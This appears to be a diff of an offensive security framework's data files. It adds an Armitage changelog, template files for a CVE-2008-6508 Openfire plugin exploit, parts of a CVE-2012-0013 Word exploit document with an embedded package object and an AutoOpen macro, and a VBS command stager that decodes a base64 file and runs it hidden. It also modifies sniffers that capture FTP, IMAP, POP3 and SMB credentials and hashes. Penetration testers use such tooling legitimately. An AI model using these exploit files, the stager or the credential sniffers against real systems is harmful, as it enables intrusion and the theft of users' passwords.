+  This is adjustable too through Armitage -> Preferences.
+- And... the Armitage console now displays pretty colors. If you don't
+  like colors, set the console.show_colors.boolean preference to false
+  through Armitage -> Preferences.
+- Fixed a bug preventing input field from getting focus when popping a
+  console tab using Ctrl+W.
+
+14 May 12
+---------
+- Oopserific--dynamic workspace shortcuts were not bound until you
+  clicked the Workspaces menu. I fixed that.
+- Improved console pool's ability to detect a dead console. If you saw
+  "null" prompts in an open tab, it's because of a dead console. Fixed
+- Bound Ctrl+Backspace to reset dynamic workspaces. Ctrl+0 is now back
+  to what it originally did (resetting the font size to default).
+- Added Ctrl+T to take a screenshot of the active tab
+- Added Ctrl+W to pop the active tab into its own window
+- Armitage team server is now SSL enabled. The teamserver script (you
+  are using it, right?) generates a certificate for you using keytool.
+  The server presents the SHA1 hash of its certificate. Armitage users
+  have the opportunity to verify and trust the hash of the certificate
+  presented to them or to reject it and not connect.
+- Added Ctrl+Left / Ctrl+Right to quickly navigate through tabs.
+- Added a check to prevent clients from connecting to msfrpcd directly
+  when teaming is enabled.
+- Fixed a bug that prevented command shells from opening on some sessions
+- Team server client now caches certain calls to RPC server.
+- Reworked the Loot/Downloads View button. Now, all highlighted files are
+  displayed in one View tab. This makes searching easier. Each file is
+  displayed with a colored header (to make it easier to tell when one file
+  ends and the other begins). 
+- Added Sync Files button to Loot/Downloads tabs when connected to a team
+  server. This button will download all files associated with the highlighted
+  rows and save them in the Armitage data directory.
+
+7 May 12
+--------
+Note: Armitage team server setup has changed. Refer to the manual for
+the latest information: http://www.fastandeasyhacking.com/manual#7
+
+- Armitage team mode now routes all Metasploit-bound calls through the
+  deconfliction server. Armitage also pools "temporary" Metasploit
+  consoles. It's too bad this is logged as one change, because it's 
+  more like twenty. These changes were motivated by a desire to avoid 
+  triggering a race condition that was introduced w/ Metasploit 4.3.0.
+         http://dev.metasploit.com/redmine/issues/6829
+
+  On the bright side these changes will allow a lot more flexibility 
+  to optimize how Armitage interacts with msfrpcd and to do some neat 
+  things (like logging) in a centralized way.
+- Module description (in module launch dialog) is now resizable.
+- Added Ctrl+D keyboard shortcut to close active tab.
+- Armitage now uses (more robust) console queue for launching post
+  modules, handlers, brute force attacks, and other things.
+- Fixed a race condition in the Jobs tab refresh after killing a job
+- Armitage now filters smb hashes from non-psexec/smb login dialogs.
+- Added armitage.log_data_here.folder setting. This setting lets you
+  specify where Armitage will save its logs, downloaded files, and
+  screenshots. *cough* Some penetration testers like to dump everything
+  to an encrypted volume. *cough*. I apologize it took this long to
+  get this feature in place.
+- Improved perceived responsiveness of a console interaction
+
 17 Apr 12
 ---------
 - Modified how Armitage determines a console command is complete to stay 

data/exploits/CVE-2008-6508/changelog.html

@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin changelog</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add changelog content here
+</p>
+</body>
+</html>

data/exploits/CVE-2008-6508/plugin.xml

@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<plugin>
+   <class>com.example.openfire.plugin.Example</class>
+   <name>PLUGINNAME</name>
+   <description>PLUGINDESCRIPTION</description>
+   <author>PLUGINAUTHOR</author>
+   <version>1.0.0</version>
+   <date>7/7/2008</date>
+   <minServerVersion>3.5.0</minServerVersion>
+</plugin>

data/exploits/CVE-2008-6508/readme.html

@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin readme</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add readme content here
+</p>
+</body>
+</html>

data/exploits/CVE-2012-0013/[Content_Types].xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="emf" ContentType="image/x-emf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/stylesWithEffects.xml" ContentType="application/vnd.ms-word.stylesWithEffects+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

data/exploits/CVE-2012-0013/_rels/__rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

data/exploits/CVE-2012-0013/docProps/app.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>1</TotalTime><Pages>1</Pages><Words>2</Words><Characters>13</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>14</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>14.0000</AppVersion></Properties>

data/exploits/CVE-2012-0013/docProps/core.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>Windows User</dc:creator><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>2</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:modified></cp:coreProperties>

data/exploits/CVE-2012-0013/word/_rels/document.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/></Relationships>

data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>

data/exploits/CVE-2012-0013/word/document.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><w:body><w:p w:rsidR="00EB5F66" w:rsidRDefault="006042EE"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:r><w:rPr><w:noProof/></w:rPr><w:pict><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"><v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/><v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:80.2pt;height:40.5pt;z-index:-251657216;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text"><v:imagedata r:id="rId6" o:title=""/></v:shape><o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1400592552" r:id="rId7"/></w:pict></w:r><w:bookmarkEnd w:id="0"/><w:r><w:t>W00TW00T</w:t></w:r></w:p><w:sectPr w:rsidR="00EB5F66"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

data/exploits/CVE-2012-0013/word/fontTable.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>

data/exploits/CVE-2012-0013/word/settings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="14"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="002B771F"/><w:rsid w:val="002B771F"/><w:rsid w:val="006042EE"/><w:rsid w:val="00EB5F66"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1027"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>

data/exploits/CVE-2012-0013/word/vbaData.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

data/exploits/CVE-2012-0013/word/webSettings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:optimizeForBrowser/><w:allowPNG/></w:webSettings>

data/exploits/batik_svg/META-INF/MANIFEST.MF

@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+SVG-Handler-Class: Exploit
+

data/exploits/cmdstager/vbs_b64_sleep

@@ -0,0 +1,41 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub

data/exploits/psnuffle/ftp.rb

@@ -15,6 +15,7 @@ class SnifferFTP < BaseProtocolParser
 			:pass		=> /^PASS\s+([^\s]+)/i,
 			:login_pass => /^(230\s*[^\n]+)/i,
 			:login_fail => /^(5\d\d\s*[^\n]+)/i,
+			:bye      => /^221/
 		}
 	end
 
@@ -23,6 +24,7 @@ class SnifferFTP < BaseProtocolParser
 		return unless pkt.is_tcp?
 		return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
 		s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
+		s[:sname] ||= "ftp"
 
 		self.sigs.each_key do |k|
 			# There is only one pattern per run to test
@@ -38,21 +40,17 @@ class SnifferFTP < BaseProtocolParser
 
 			when :login_fail
 				if(s[:user] and s[:pass])
-					s[:proto]="ftp"
-					s[:extra]="Failed Login. Banner: #{s[:banner]}"
-					report_auth_info(s)
-					print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+					report_auth_info(s.merge({:active => false}))
+					print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
 
-					s[:pass]=""
+					s[:pass] = ""
 					return
 				end
 
 			when :login_pass
 				if(s[:user] and s[:pass])
-					s[:proto]="ftp"
-					s[:extra]="Successful Login. Banner: #{s[:banner]}"
 					report_auth_info(s)
-					print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+					print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
 					# Remove it form the session objects so freeup memory
 					sessions.delete(s[:session])
 					return
@@ -60,12 +58,14 @@ class SnifferFTP < BaseProtocolParser
 
 			when :banner
 				# Because some ftp server send multiple banner we take only the first one and ignore the rest
-				if not (s[:banner])
-					sessions[s[:session]].merge!({k => matches})
-					s[:name]="FTP Server Welcome Banner: \"#{s[:banner]}\""
+				if not (s[:info])
+					s[:info] = matches
 					report_service(s)
 				end
 
+			when :bye
+				sessions.delete(s[:session])
+
 			when nil
 				# No matches, no saved state
 			else

data/exploits/psnuffle/imap.rb

@@ -25,6 +25,7 @@ class SnifferIMAP < BaseProtocolParser
 		return unless pkt.is_tcp?
 		return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
 		s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
+		s[:sname] ||= "imap4"
 
 		self.sigs.each_key do |k|
 			# There is only one pattern per run to test
@@ -38,14 +39,11 @@ class SnifferIMAP < BaseProtocolParser
 
 			case matched
 			when :banner
-				s[:banner] = matches
-				s[:name]   = "IMAP Server Welcome Banner: #{s[:banner]}"
+				s[:info] = matches
 				report_service(s)
 
 			when :login_pass
 
-				s[:proto]="imap4"
-				s[:extra]="Sucessful Login. Banner: #{s[:banner]}"
 				report_auth_info(s)
 				print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 
@@ -54,18 +52,14 @@ class SnifferIMAP < BaseProtocolParser
 
 			when :login_fail
 
-				s[:proto]="imap4"
-				s[:extra]="Failed Login. Banner: #{s[:banner]}"
-				report_auth_info(s)
+				report_auth_info(s.merge({:active => false}))
 				print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 
 				# Remove it form the session objects so freeup
 				sessions.delete(s[:session])
 
 			when :login_bad
-				s[:proto]="imap4"
-				s[:extra]="Failed Login. Banner: #{s[:banner]}"
-				report_auth_info(s)
+				report_auth_info(s.merge({:active => false}))
 				print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 
 				# Remove it form the session objects so freeup

data/exploits/psnuffle/pop3.rb

@@ -38,8 +38,9 @@ class SnifferPOP3 < BaseProtocolParser
 					case s[:last]
 						when nil
 							# Its the first +OK must include the banner, worst case its just +OK
-							s[:banner] = matches
-							s[:name]   = "POP3 Server Welcome Banner: \"#{s[:banner]}\""
+							s[:info]  = matches
+							s[:proto] = "tcp"
+							s[:name]  = "pop3"
 							report_service(s)
 
 						when :user
@@ -48,8 +49,9 @@ class SnifferPOP3 < BaseProtocolParser
 						when :pass
 							# Perfect we get an +OK after a PASS command this means right password given :-)
 
-							s[:proto]="pop3"
-							s[:extra]="Successful Login. Banner: #{s[:banner]}"
+							s[:proto] = "tcp"
+							s[:name]  = "pop3"
+							s[:extra] = "Successful Login. Banner: #{s[:banner]}"
 							report_auth_info(s)
 							print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 

data/exploits/psnuffle/smb.rb

@@ -5,26 +5,31 @@
 #
 
 #Memo : 
-# Authentification without extended security set
-	#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
-	#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
-	#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
-	#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
+#FOR SMBV1
+	# Authentification without extended security set
+		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
+		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
+		#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
+		#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
 
-# Authentification with extended security set
-	#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-	#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-	#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
-	#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
-	#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
-	#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
+	# Authentification with extended security set
+		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+		#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
+		#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
+		#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
+		#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
+#FOR SMBV2
+	#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response 
 
 class SnifferSMB < BaseProtocolParser
 
 	def register_sigs
 		self.sigs = {
-			:setupandx		=> /\xffSMB\x73/,
-			:negotiate		=> /\xffSMB\x72/,
+			:smb1_negotiate		=> /\xffSMB\x72/n,
+			:smb1_setupandx		=> /\xffSMB\x73/n,
+			#:smb2_negotiate	=> /\xFESMB\x40\x00(.){6}\x00\x00/n,
+			:smb2_setupandx		=> /\xFESMB\x40\x00(.){6}\x01\x00/n
 		}
 	end
 
@@ -45,7 +50,7 @@ class SnifferSMB < BaseProtocolParser
 			end
 
 			case matched
-			when :negotiate
+			when :smb1_negotiate
 				payload = pkt.payload.dup
